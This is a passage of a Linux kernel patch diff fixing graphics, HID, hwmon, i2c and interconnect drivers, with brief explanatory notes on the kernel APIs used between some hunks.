+@@ -745,12 +745,12 @@ int intel_gt_init(struct intel_gt *gt)
+ 	if (err)
+ 		goto err_gt;
+ 
+-	intel_uc_init_late(&gt->uc);
+-
+ 	err = i915_inject_probe_error(gt->i915, -EIO);
+ 	if (err)
+ 		goto err_gt;
+ 
++	intel_uc_init_late(&gt->uc);
++
+ 	intel_migrate_init(&gt->migrate, gt);
+ 
+ 	intel_pxp_init(&gt->pxp);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_pm.c b/drivers/gpu/drm/i915/gt/intel_gt_pm.c
+index 16db85fab0b19..3fbf70a587474 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_pm.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_pm.c
+@@ -20,31 +20,10 @@
+ #include "intel_rc6.h"
+ #include "intel_rps.h"
+ #include "intel_wakeref.h"
+-#include "intel_pcode.h"
+ #include "pxp/intel_pxp_pm.h"
+ 
+ #define I915_GT_SUSPEND_IDLE_TIMEOUT (HZ / 2)
+ 
+-static void mtl_media_busy(struct intel_gt *gt)
+-{
+-	/* Wa_14017073508: mtl */
+-	if (IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0) &&
+-	    gt->type == GT_MEDIA)
+-		snb_pcode_write_p(gt->uncore, PCODE_MBOX_GT_STATE,
+-				  PCODE_MBOX_GT_STATE_MEDIA_BUSY,
+-				  PCODE_MBOX_GT_STATE_DOMAIN_MEDIA, 0);
+-}
+-
+-static void mtl_media_idle(struct intel_gt *gt)
+-{
+-	/* Wa_14017073508: mtl */
+-	if (IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0) &&
+-	    gt->type == GT_MEDIA)
+-		snb_pcode_write_p(gt->uncore, PCODE_MBOX_GT_STATE,
+-				  PCODE_MBOX_GT_STATE_MEDIA_NOT_BUSY,
+-				  PCODE_MBOX_GT_STATE_DOMAIN_MEDIA, 0);
+-}
+-
+ static void user_forcewake(struct intel_gt *gt, bool suspend)
+ {
+ 	int count = atomic_read(&gt->user_wakeref);
+@@ -92,9 +71,6 @@ static int __gt_unpark(struct intel_wakeref *wf)
+ 
+ 	GT_TRACE(gt, "\n");
+ 
+-	/* Wa_14017073508: mtl */
+-	mtl_media_busy(gt);
+-
+ 	/*
+ 	 * It seems that the DMC likes to transition between the DC states a lot
+ 	 * when there are no connected displays (no active power domains) during
+@@ -144,9 +120,6 @@ static int __gt_park(struct intel_wakeref *wf)
+ 	GEM_BUG_ON(!wakeref);
+ 	intel_display_power_put_async(i915, POWER_DOMAIN_GT_IRQ, wakeref);
+ 
+-	/* Wa_14017073508: mtl */
+-	mtl_media_idle(gt);
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c b/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c
+index 83df4cd5e06cb..80dbbef86b1db 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_pm_debugfs.c
+@@ -580,7 +580,7 @@ static bool perf_limit_reasons_eval(void *data)
+ }
+ 
+ DEFINE_SIMPLE_ATTRIBUTE(perf_limit_reasons_fops, perf_limit_reasons_get,
+-			perf_limit_reasons_clear, "%llu\n");
++			perf_limit_reasons_clear, "0x%llx\n");
+ 
+ void intel_gt_pm_debugfs_register(struct intel_gt *gt, struct dentry *root)
+ {
+diff --git a/drivers/gpu/drm/i915/gt/intel_rc6.c b/drivers/gpu/drm/i915/gt/intel_rc6.c
+index 2ee4051e4d961..6184fcc169877 100644
+--- a/drivers/gpu/drm/i915/gt/intel_rc6.c
++++ b/drivers/gpu/drm/i915/gt/intel_rc6.c
+@@ -486,6 +486,7 @@ static bool bxt_check_bios_rc6_setup(struct intel_rc6 *rc6)
+ static bool rc6_supported(struct intel_rc6 *rc6)
+ {
+ 	struct drm_i915_private *i915 = rc6_to_i915(rc6);
++	struct intel_gt *gt = rc6_to_gt(rc6);
+ 
+ 	if (!HAS_RC6(i915))
+ 		return false;
+@@ -502,6 +503,13 @@ static bool rc6_supported(struct intel_rc6 *rc6)
+ 		return false;
+ 	}
+ 
++	if (IS_MTL_MEDIA_STEP(gt->i915, STEP_A0, STEP_B0) &&
++	    gt->type == GT_MEDIA) {
++		drm_notice(&i915->drm,
++			   "Media RC6 disabled on A step\n");
++		return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+index 1c1b85073b4bd..710999d7189ee 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_capture.c
+@@ -1506,7 +1506,7 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ 	if (!ebuf || !ee)
+ 		return -EINVAL;
+-	cap = ee->capture;
++	cap = ee->guc_capture;
+ 	if (!cap || !ee->engine)
+ 		return -ENODEV;
+ 
+@@ -1571,13 +1571,34 @@ int intel_guc_capture_print_engine_node(struct drm_i915_error_state_buf *ebuf,
+ 
+ #endif //CONFIG_DRM_I915_CAPTURE_ERROR
+ 
++static void guc_capture_find_ecode(struct intel_engine_coredump *ee)
++{
++	struct gcap_reg_list_info *reginfo;
++	struct guc_mmio_reg *regs;
++	i915_reg_t reg_ipehr = RING_IPEHR(0);
++	i915_reg_t reg_instdone = RING_INSTDONE(0);
++	int i;
++
++	if (!ee->guc_capture_node)
++		return;
++
++	reginfo = ee->guc_capture_node->reginfo + GUC_CAPTURE_LIST_TYPE_ENGINE_INSTANCE;
++	regs = reginfo->regs;
++	for (i = 0; i < reginfo->num_regs; i++) {
++		if (regs[i].offset == reg_ipehr.reg)
++			ee->ipehr = regs[i].value;
++		else if (regs[i].offset == reg_instdone.reg)
++			ee->instdone.instdone = regs[i].value;
++	}
++}
++
+ void intel_guc_capture_free_node(struct intel_engine_coredump *ee)
+ {
+ 	if (!ee || !ee->guc_capture_node)
+ 		return;
+ 
+-	guc_capture_add_node_to_cachelist(ee->capture, ee->guc_capture_node);
+-	ee->capture = NULL;
++	guc_capture_add_node_to_cachelist(ee->guc_capture, ee->guc_capture_node);
++	ee->guc_capture = NULL;
+ 	ee->guc_capture_node = NULL;
+ }
+ 
+@@ -1611,7 +1632,8 @@ void intel_guc_capture_get_matching_node(struct intel_gt *gt,
+ 		    (ce->lrc.lrca & CTX_GTT_ADDRESS_MASK)) {
+ 			list_del(&n->link);
+ 			ee->guc_capture_node = n;
+-			ee->capture = guc->capture;
++			ee->guc_capture = guc->capture;
++			guc_capture_find_ecode(ee);
+ 			return;
+ 		}
+ 	}
+diff --git a/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c b/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c
+index b5855091cf6a9..8f8dd05835c5a 100644
+--- a/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c
++++ b/drivers/gpu/drm/i915/gt/uc/intel_guc_rc.c
+@@ -11,20 +11,9 @@
+ 
+ static bool __guc_rc_supported(struct intel_guc *guc)
+ {
+-	struct intel_gt *gt = guc_to_gt(guc);
+-
+-	/*
+-	 * Wa_14017073508: mtl
+-	 * Do not enable gucrc to avoid additional interrupts which
+-	 * may disrupt pcode wa.
+-	 */
+-	if (IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0) &&
+-	    gt->type == GT_MEDIA)
+-		return false;
+-
+ 	/* GuC RC is unavailable for pre-Gen12 */
+ 	return guc->submission_supported &&
+-		GRAPHICS_VER(gt->i915) >= 12;
++		GRAPHICS_VER(guc_to_gt(guc)->i915) >= 12;
+ }
+ 
+ static bool __guc_rc_selected(struct intel_guc *guc)
+diff --git a/drivers/gpu/drm/i915/i915_active.c b/drivers/gpu/drm/i915/i915_active.c
+index a9fea115f2d26..8ef93889061a6 100644
+--- a/drivers/gpu/drm/i915/i915_active.c
++++ b/drivers/gpu/drm/i915/i915_active.c
+@@ -92,8 +92,7 @@ static void debug_active_init(struct i915_active *ref)
+ static void debug_active_activate(struct i915_active *ref)
+ {
+ 	lockdep_assert_held(&ref->tree_lock);
+-	if (!atomic_read(&ref->count)) /* before the first inc */
+-		debug_object_activate(ref, &active_debug_desc);
++	debug_object_activate(ref, &active_debug_desc);
+ }
+ 
+ static void debug_active_deactivate(struct i915_active *ref)
+diff --git a/drivers/gpu/drm/i915/i915_gpu_error.h b/drivers/gpu/drm/i915/i915_gpu_error.h
+index efc75cc2ffdb9..56027ffbce51f 100644
+--- a/drivers/gpu/drm/i915/i915_gpu_error.h
++++ b/drivers/gpu/drm/i915/i915_gpu_error.h
+@@ -94,7 +94,7 @@ struct intel_engine_coredump {
+ 	struct intel_instdone instdone;
+ 
+ 	/* GuC matched capture-lists info */
+-	struct intel_guc_state_capture *capture;
++	struct intel_guc_state_capture *guc_capture;
+ 	struct __guc_capture_parsed_output *guc_capture_node;
+ 
+ 	struct i915_gem_context_coredump {
+diff --git a/drivers/gpu/drm/i915/i915_reg.h b/drivers/gpu/drm/i915/i915_reg.h
+index 9161768725449..4f84cda3f9b5e 100644
+--- a/drivers/gpu/drm/i915/i915_reg.h
++++ b/drivers/gpu/drm/i915/i915_reg.h
+@@ -6616,15 +6616,6 @@
+ /*   XEHP_PCODE_FREQUENCY_CONFIG param2 */
+ #define     PCODE_MBOX_DOMAIN_NONE		0x0
+ #define     PCODE_MBOX_DOMAIN_MEDIAFF		0x3
+-
+-/* Wa_14017210380: mtl */
+-#define   PCODE_MBOX_GT_STATE			0x50
+-/* sub-commands (param1) */
+-#define     PCODE_MBOX_GT_STATE_MEDIA_BUSY	0x1
+-#define     PCODE_MBOX_GT_STATE_MEDIA_NOT_BUSY	0x2
+-/* param2 */
+-#define     PCODE_MBOX_GT_STATE_DOMAIN_MEDIA	0x1
+-
+ #define GEN6_PCODE_DATA				_MMIO(0x138128)
+ #define   GEN6_PCODE_FREQ_IA_RATIO_SHIFT	8
+ #define   GEN6_PCODE_FREQ_RING_RATIO_SHIFT	16
+diff --git a/drivers/gpu/drm/meson/meson_drv.c b/drivers/gpu/drm/meson/meson_drv.c
+index 79bfe3938d3c6..7caf937c3c90d 100644
+--- a/drivers/gpu/drm/meson/meson_drv.c
++++ b/drivers/gpu/drm/meson/meson_drv.c
+@@ -325,23 +325,23 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ 	ret = meson_encoder_hdmi_init(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_plane_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_overlay_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = meson_crtc_create(priv);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	ret = request_irq(priv->vsync_irq, meson_irq, 0, drm->driver->name, drm);
+ 	if (ret)
+-		goto exit_afbcd;
++		goto unbind_all;
+ 
+ 	drm_mode_config_reset(drm);
+ 
+@@ -359,6 +359,9 @@ static int meson_drv_bind_master(struct device *dev, bool has_components)
+ 
+ uninstall_irq:
+ 	free_irq(priv->vsync_irq, drm);
++unbind_all:
++	if (has_components)
++		component_unbind_all(drm->dev, drm);
+ exit_afbcd:
+ 	if (priv->afbcd.ops)
+ 		priv->afbcd.ops->exit(priv);
+diff --git a/drivers/gpu/drm/tiny/cirrus.c b/drivers/gpu/drm/tiny/cirrus.c
+index 678c2ef1cae70..ffa7e61dd1835 100644
+--- a/drivers/gpu/drm/tiny/cirrus.c
++++ b/drivers/gpu/drm/tiny/cirrus.c
+@@ -455,7 +455,7 @@ static void cirrus_pipe_update(struct drm_simple_display_pipe *pipe,
+ 	if (state->fb && cirrus->cpp != cirrus_cpp(state->fb))
+ 		cirrus_mode_set(cirrus, &crtc->mode, state->fb);
+ 
+-	if (drm_atomic_helper_damage_merged(old_state, state, &rect))
++	if (state->fb && drm_atomic_helper_damage_merged(old_state, state, &rect))
+ 		cirrus_fb_blit_rect(state->fb, &shadow_plane_state->data[0], &rect);
+ }
+ 
+diff --git a/drivers/hid/hid-cp2112.c b/drivers/hid/hid-cp2112.c
+index 1e16b0fa310d1..27cadadda7c9d 100644
+--- a/drivers/hid/hid-cp2112.c
++++ b/drivers/hid/hid-cp2112.c
+@@ -1354,6 +1354,7 @@ static int cp2112_probe(struct hid_device *hdev, const struct hid_device_id *id)
+ 	girq->parents = NULL;
+ 	girq->default_type = IRQ_TYPE_NONE;
+ 	girq->handler = handle_simple_irq;
++	girq->threaded = true;
+ 
+ 	ret = gpiochip_add_data(&dev->gc, dev);
+ 	if (ret < 0) {
+diff --git a/drivers/hid/hid-logitech-hidpp.c b/drivers/hid/hid-logitech-hidpp.c
+index 5efc591a02a03..3c00e6ac8e76a 100644
+--- a/drivers/hid/hid-logitech-hidpp.c
++++ b/drivers/hid/hid-logitech-hidpp.c
+@@ -4378,6 +4378,8 @@ static const struct hid_device_id hidpp_devices[] = {
+ 	{ HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb01e) },
+ 	{ /* MX Master 3 mouse over Bluetooth */
+ 	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb023) },
++	{ /* MX Master 3S mouse over Bluetooth */
++	  HID_BLUETOOTH_DEVICE(USB_VENDOR_ID_LOGITECH, 0xb034) },
+ 	{}
+ };
+ 
+diff --git a/drivers/hid/intel-ish-hid/ipc/ipc.c b/drivers/hid/intel-ish-hid/ipc/ipc.c
+index 15e14239af829..a49c6affd7c4c 100644
+--- a/drivers/hid/intel-ish-hid/ipc/ipc.c
++++ b/drivers/hid/intel-ish-hid/ipc/ipc.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014-2016, Intel Corporation.
+  */
+ 
++#include <linux/devm-helpers.h>
+ #include <linux/sched.h>
+ #include <linux/spinlock.h>
+ #include <linux/delay.h>
+@@ -621,7 +622,6 @@ static void	recv_ipc(struct ishtp_device *dev, uint32_t doorbell_val)
+ 	case MNG_RESET_NOTIFY:
+ 		if (!ishtp_dev) {
+ 			ishtp_dev = dev;
+-			INIT_WORK(&fw_reset_work, fw_reset_work_fn);
+ 		}
+ 		schedule_work(&fw_reset_work);
+ 		break;
+@@ -940,6 +940,7 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ {
+ 	struct ishtp_device *dev;
+ 	int	i;
++	int	ret;
+ 
+ 	dev = devm_kzalloc(&pdev->dev,
+ 			   sizeof(struct ishtp_device) + sizeof(struct ish_hw),
+@@ -975,6 +976,12 @@ struct ishtp_device *ish_dev_init(struct pci_dev *pdev)
+ 		list_add_tail(&tx_buf->link, &dev->wr_free_list);
+ 	}
+ 
++	ret = devm_work_autocancel(&pdev->dev, &fw_reset_work, fw_reset_work_fn);
++	if (ret) {
++		dev_err(dev->devc, "Failed to initialise FW reset work\n");
++		return NULL;
++	}
++
+ 	dev->ops = &ish_hw_ops;
+ 	dev->devc = &pdev->dev;
+ 	dev->mtu = IPC_PAYLOAD_SIZE - sizeof(struct ishtp_msg_hdr);
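
devm_work_autocancel() (from <linux/devm-helpers.h>) combines INIT_WORK() with a devres action that runs cancel_work_sync() on driver detach, which is why the open-coded INIT_WORK() in the interrupt path above can be dropped and why a queued item can no longer run against freed device state. A minimal probe-side sketch with a hypothetical work item and handler:

	#include <linux/devm-helpers.h>
	#include <linux/platform_device.h>

	static struct work_struct demo_work;		/* hypothetical work item */

	static void demo_work_fn(struct work_struct *w)	/* hypothetical handler */
	{
		/* runs in process context; the device-managed cancel keeps it
		 * from racing with driver removal */
	}

	static int demo_probe(struct platform_device *pdev)
	{
		int ret;

		ret = devm_work_autocancel(&pdev->dev, &demo_work, demo_work_fn);
		if (ret)
			return ret;	/* devres registration failed (-ENOMEM) */

		return 0;
	}
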
+diff --git a/drivers/hwmon/hwmon.c b/drivers/hwmon/hwmon.c
+index 33edb5c02f7d7..d193ed3cb35e5 100644
+--- a/drivers/hwmon/hwmon.c
++++ b/drivers/hwmon/hwmon.c
+@@ -757,6 +757,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	struct hwmon_device *hwdev;
+ 	const char *label;
+ 	struct device *hdev;
++	struct device *tdev = dev;
+ 	int i, err, id;
+ 
+ 	/* Complain about invalid characters in hwmon name attribute */
+@@ -826,7 +827,9 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 	hwdev->name = name;
+ 	hdev->class = &hwmon_class;
+ 	hdev->parent = dev;
+-	hdev->of_node = dev ? dev->of_node : NULL;
++	while (tdev && !tdev->of_node)
++		tdev = tdev->parent;
++	hdev->of_node = tdev ? tdev->of_node : NULL;
+ 	hwdev->chip = chip;
+ 	dev_set_drvdata(hdev, drvdata);
+ 	dev_set_name(hdev, HWMON_ID_FORMAT, id);
+@@ -838,7 +841,7 @@ __hwmon_device_register(struct device *dev, const char *name, void *drvdata,
+ 
+ 	INIT_LIST_HEAD(&hwdev->tzdata);
+ 
+-	if (dev && dev->of_node && chip && chip->ops->read &&
++	if (hdev->of_node && chip && chip->ops->read &&
+ 	    chip->info[0]->type == hwmon_chip &&
+ 	    (chip->info[0]->config[0] & HWMON_C_REGISTER_TZ)) {
+ 		err = hwmon_thermal_register_sensors(hdev);
+diff --git a/drivers/hwmon/it87.c b/drivers/hwmon/it87.c
+index 9997f76b1f4aa..b7c7cf2157018 100644
+--- a/drivers/hwmon/it87.c
++++ b/drivers/hwmon/it87.c
+@@ -490,6 +490,8 @@ static const struct it87_devices it87_devices[] = {
+ #define has_pwm_freq2(data)	((data)->features & FEAT_PWM_FREQ2)
+ #define has_six_temp(data)	((data)->features & FEAT_SIX_TEMP)
+ #define has_vin3_5v(data)	((data)->features & FEAT_VIN3_5V)
++#define has_scaling(data)	((data)->features & (FEAT_12MV_ADC | \
++						     FEAT_10_9MV_ADC))
+ 
+ struct it87_sio_data {
+ 	int sioaddr;
+@@ -3100,7 +3102,7 @@ static int it87_probe(struct platform_device *pdev)
+ 			 "Detected broken BIOS defaults, disabling PWM interface\n");
+ 
+ 	/* Starting with IT8721F, we handle scaling of internal voltages */
+-	if (has_12mv_adc(data)) {
++	if (has_scaling(data)) {
+ 		if (sio_data->internal & BIT(0))
+ 			data->in_scaled |= BIT(3);	/* in3 is AVCC */
+ 		if (sio_data->internal & BIT(1))
+diff --git a/drivers/i2c/busses/i2c-hisi.c b/drivers/i2c/busses/i2c-hisi.c
+index 8c6c7075c765c..f5c37d2f536bc 100644
+--- a/drivers/i2c/busses/i2c-hisi.c
++++ b/drivers/i2c/busses/i2c-hisi.c
+@@ -341,7 +341,11 @@ static irqreturn_t hisi_i2c_irq(int irq, void *context)
+ 		hisi_i2c_read_rx_fifo(ctlr);
+ 
+ out:
+-	if (int_stat & HISI_I2C_INT_TRANS_CPLT || ctlr->xfer_err) {
++	/*
++	 * Only use TRANS_CPLT to indicate the completion. On error cases we'll
++	 * get two interrupts, INT_ERR first then TRANS_CPLT.
++	 */
++	if (int_stat & HISI_I2C_INT_TRANS_CPLT) {
+ 		hisi_i2c_disable_int(ctlr, HISI_I2C_INT_ALL);
+ 		hisi_i2c_clear_int(ctlr, HISI_I2C_INT_ALL);
+ 		complete(ctlr->completion);
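
On a failed transfer this controller raises INT_ERR first and TRANS_CPLT afterwards, so completing on either bit could wake the waiting thread while a second interrupt was still in flight. The single-wakeup discipline, schematically; mask and helper names are illustrative:

	if (int_stat & DEMO_INT_ERR_MASK)
		ctlr->xfer_err = int_stat;		/* record the error, don't wake yet */

	if (int_stat & DEMO_INT_TRANS_CPLT) {
		demo_irq_disable_and_clear(ctlr);	/* hypothetical helper */
		complete(ctlr->completion);		/* exactly one completion per transfer */
	}
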
+diff --git a/drivers/i2c/busses/i2c-imx-lpi2c.c b/drivers/i2c/busses/i2c-imx-lpi2c.c
+index 188f2a36d2fd6..9b2f9544c5681 100644
+--- a/drivers/i2c/busses/i2c-imx-lpi2c.c
++++ b/drivers/i2c/busses/i2c-imx-lpi2c.c
+@@ -503,10 +503,14 @@ disable:
+ static irqreturn_t lpi2c_imx_isr(int irq, void *dev_id)
+ {
+ 	struct lpi2c_imx_struct *lpi2c_imx = dev_id;
++	unsigned int enabled;
+ 	unsigned int temp;
+ 
++	enabled = readl(lpi2c_imx->base + LPI2C_MIER);
++
+ 	lpi2c_imx_intctrl(lpi2c_imx, 0);
+ 	temp = readl(lpi2c_imx->base + LPI2C_MSR);
++	temp &= enabled;
+ 
+ 	if (temp & MSR_RDF)
+ 		lpi2c_imx_read_rxfifo(lpi2c_imx);
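
Masking the raw status with the currently enabled interrupt sources is standard ISR hygiene: status bits can stay latched from an earlier transfer, or assert while their interrupt is disabled, and acting on them would drive the FIFO handlers at the wrong time. The core of the fix in two lines, with illustrative register names:

	u32 enabled = readl(base + DEMO_IER);		/* which sources are armed */
	u32 pending = readl(base + DEMO_ISR) & enabled;	/* act only on those */
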
+diff --git a/drivers/i2c/busses/i2c-mxs.c b/drivers/i2c/busses/i2c-mxs.c
+index d113bed795452..e0f3b3545cfe4 100644
+--- a/drivers/i2c/busses/i2c-mxs.c
++++ b/drivers/i2c/busses/i2c-mxs.c
+@@ -171,7 +171,7 @@ static void mxs_i2c_dma_irq_callback(void *param)
+ }
+ 
+ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+-			struct i2c_msg *msg, uint32_t flags)
++			struct i2c_msg *msg, u8 *buf, uint32_t flags)
+ {
+ 	struct dma_async_tx_descriptor *desc;
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+@@ -226,7 +226,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		}
+ 
+ 		/* Queue the DMA data transfer. */
+-		sg_init_one(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_init_one(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, &i2c->sg_io[1], 1, DMA_FROM_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, &i2c->sg_io[1], 1,
+ 					DMA_DEV_TO_MEM,
+@@ -259,7 +259,7 @@ static int mxs_i2c_dma_setup_xfer(struct i2c_adapter *adap,
+ 		/* Queue the DMA data transfer. */
+ 		sg_init_table(i2c->sg_io, 2);
+ 		sg_set_buf(&i2c->sg_io[0], &i2c->addr_data, 1);
+-		sg_set_buf(&i2c->sg_io[1], msg->buf, msg->len);
++		sg_set_buf(&i2c->sg_io[1], buf, msg->len);
+ 		dma_map_sg(i2c->dev, i2c->sg_io, 2, DMA_TO_DEVICE);
+ 		desc = dmaengine_prep_slave_sg(i2c->dmach, i2c->sg_io, 2,
+ 					DMA_MEM_TO_DEV,
+@@ -563,6 +563,7 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 	struct mxs_i2c_dev *i2c = i2c_get_adapdata(adap);
+ 	int ret;
+ 	int flags;
++	u8 *dma_buf;
+ 	int use_pio = 0;
+ 	unsigned long time_left;
+ 
+@@ -588,13 +589,20 @@ static int mxs_i2c_xfer_msg(struct i2c_adapter *adap, struct i2c_msg *msg,
+ 		if (ret && (ret != -ENXIO))
+ 			mxs_i2c_reset(i2c);
+ 	} else {
++		dma_buf = i2c_get_dma_safe_msg_buf(msg, 1);
++		if (!dma_buf)
++			return -ENOMEM;
++
+ 		reinit_completion(&i2c->cmd_complete);
+-		ret = mxs_i2c_dma_setup_xfer(adap, msg, flags);
+-		if (ret)
++		ret = mxs_i2c_dma_setup_xfer(adap, msg, dma_buf, flags);
++		if (ret) {
++			i2c_put_dma_safe_msg_buf(dma_buf, msg, false);
+ 			return ret;
++		}
+ 
+ 		time_left = wait_for_completion_timeout(&i2c->cmd_complete,
+ 						msecs_to_jiffies(1000));
++		i2c_put_dma_safe_msg_buf(dma_buf, msg, true);
+ 		if (!time_left)
+ 			goto timeout;
+ 
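
i2c_get_dma_safe_msg_buf() hands back msg->buf when the message is flagged I2C_M_DMA_SAFE and a kmalloc'd bounce buffer otherwise; i2c_put_dma_safe_msg_buf() releases the bounce copy and, when xferred is true, copies read data back into the message. That closes the bug of DMA-mapping a buffer that may live on the stack or in vmalloc space. The pairing used above, sketched with hypothetical DMA helpers:

	#include <linux/i2c.h>

	static int demo_dma_xfer(struct i2c_adapter *adap, struct i2c_msg *msg)
	{
		u8 *buf;
		int ret;

		buf = i2c_get_dma_safe_msg_buf(msg, 1);	/* DMA-safe buffer for any length */
		if (!buf)
			return -ENOMEM;

		ret = demo_start_dma(adap, msg, buf);	/* hypothetical */
		if (ret) {
			/* xferred=false: nothing valid to copy back on a read */
			i2c_put_dma_safe_msg_buf(buf, msg, false);
			return ret;
		}

		ret = demo_wait_dma_done(adap);		/* hypothetical */
		i2c_put_dma_safe_msg_buf(buf, msg, ret == 0);
		return ret;
	}
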
+diff --git a/drivers/i2c/busses/i2c-xgene-slimpro.c b/drivers/i2c/busses/i2c-xgene-slimpro.c
+index 63259b3ea5abd..3538d36368a90 100644
+--- a/drivers/i2c/busses/i2c-xgene-slimpro.c
++++ b/drivers/i2c/busses/i2c-xgene-slimpro.c
+@@ -308,6 +308,9 @@ static int slimpro_i2c_blkwr(struct slimpro_i2c_dev *ctx, u32 chip,
+ 	u32 msg[3];
+ 	int rc;
+ 
++	if (writelen > I2C_SMBUS_BLOCK_MAX)
++		return -EINVAL;
++
+ 	memcpy(ctx->dma_buffer, data, writelen);
+ 	paddr = dma_map_single(ctx->dev, ctx->dma_buffer, writelen,
+ 			       DMA_TO_DEVICE);
+diff --git a/drivers/interconnect/qcom/osm-l3.c b/drivers/interconnect/qcom/osm-l3.c
+index 3a1cbfe3e481f..1bafb54f14329 100644
+--- a/drivers/interconnect/qcom/osm-l3.c
++++ b/drivers/interconnect/qcom/osm-l3.c
+@@ -236,7 +236,7 @@ static int qcom_osm_l3_probe(struct platform_device *pdev)
+ 	qnodes = desc->nodes;
+ 	num_nodes = desc->num_nodes;
+ 
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
++	data = devm_kzalloc(&pdev->dev, struct_size(data, nodes, num_nodes), GFP_KERNEL);
+ 	if (!data)
+ 		return -ENOMEM;
+ 
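
The replaced call sized the allocation from sizeof(*node) and left out the icc_onecell_data header entirely; struct_size() from <linux/overflow.h> computes header-plus-flexible-array with overflow checking. A compact sketch with a pared-down stand-in type:

	#include <linux/overflow.h>
	#include <linux/slab.h>

	struct icc_node;			/* opaque here */

	struct demo_onecell {			/* stand-in for icc_onecell_data */
		unsigned int num_nodes;
		struct icc_node *nodes[];	/* flexible array member */
	};

	struct demo_onecell *data;

	data = devm_kzalloc(dev, struct_size(data, nodes, num_nodes), GFP_KERNEL);
	if (!data)
		return -ENOMEM;
	data->num_nodes = num_nodes;		/* header plus array, one allocation */
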
+diff --git a/drivers/interconnect/qcom/qcm2290.c b/drivers/interconnect/qcom/qcm2290.c
+index 0da612d6398c5..a29cdb4fac03f 100644
+--- a/drivers/interconnect/qcom/qcm2290.c
++++ b/drivers/interconnect/qcom/qcm2290.c
+@@ -147,9 +147,9 @@ static struct qcom_icc_node mas_snoc_bimc_nrt = {
+ 	.name = "mas_snoc_bimc_nrt",
+ 	.buswidth = 16,
+ 	.qos.ap_owned = true,
+-	.qos.qos_port = 2,
++	.qos.qos_port = 3,
+ 	.qos.qos_mode = NOC_QOS_MODE_BYPASS,
+-	.mas_rpm_id = 163,
++	.mas_rpm_id = 164,
+ 	.slv_rpm_id = -1,
+ 	.num_links = ARRAY_SIZE(mas_snoc_bimc_nrt_links),
+ 	.links = mas_snoc_bimc_nrt_links,
+diff --git a/drivers/interconnect/qcom/sm8450.c b/drivers/interconnect/qcom/sm8450.c
+index e3a12e3d6e061..2d7a8e7b85ec2 100644
+--- a/drivers/interconnect/qcom/sm8450.c
++++ b/drivers/interconnect/qcom/sm8450.c
+@@ -1844,100 +1844,6 @@ static const struct qcom_icc_desc sm8450_system_noc = {
+ 	.num_bcms = ARRAY_SIZE(system_noc_bcms),
+ };
+ 
+-static int qnoc_probe(struct platform_device *pdev)
+-{
+-	const struct qcom_icc_desc *desc;
+-	struct icc_onecell_data *data;
+-	struct icc_provider *provider;
+-	struct qcom_icc_node * const *qnodes;
+-	struct qcom_icc_provider *qp;
+-	struct icc_node *node;
+-	size_t num_nodes, i;
+-	int ret;
+-
+-	desc = device_get_match_data(&pdev->dev);
+-	if (!desc)
+-		return -EINVAL;
+-
+-	qnodes = desc->nodes;
+-	num_nodes = desc->num_nodes;
+-
+-	qp = devm_kzalloc(&pdev->dev, sizeof(*qp), GFP_KERNEL);
+-	if (!qp)
+-		return -ENOMEM;
+-
+-	data = devm_kcalloc(&pdev->dev, num_nodes, sizeof(*node), GFP_KERNEL);
+-	if (!data)
+-		return -ENOMEM;
+-
+-	provider = &qp->provider;
+-	provider->dev = &pdev->dev;
+-	provider->set = qcom_icc_set;
+-	provider->pre_aggregate = qcom_icc_pre_aggregate;
+-	provider->aggregate = qcom_icc_aggregate;
+-	provider->xlate_extended = qcom_icc_xlate_extended;
+-	INIT_LIST_HEAD(&provider->nodes);
+-	provider->data = data;
+-
+-	qp->dev = &pdev->dev;
+-	qp->bcms = desc->bcms;
+-	qp->num_bcms = desc->num_bcms;
+-
+-	qp->voter = of_bcm_voter_get(qp->dev, NULL);
+-	if (IS_ERR(qp->voter))
+-		return PTR_ERR(qp->voter);
+-
+-	ret = icc_provider_add(provider);
+-	if (ret) {
+-		dev_err(&pdev->dev, "error adding interconnect provider\n");
+-		return ret;
+-	}
+-
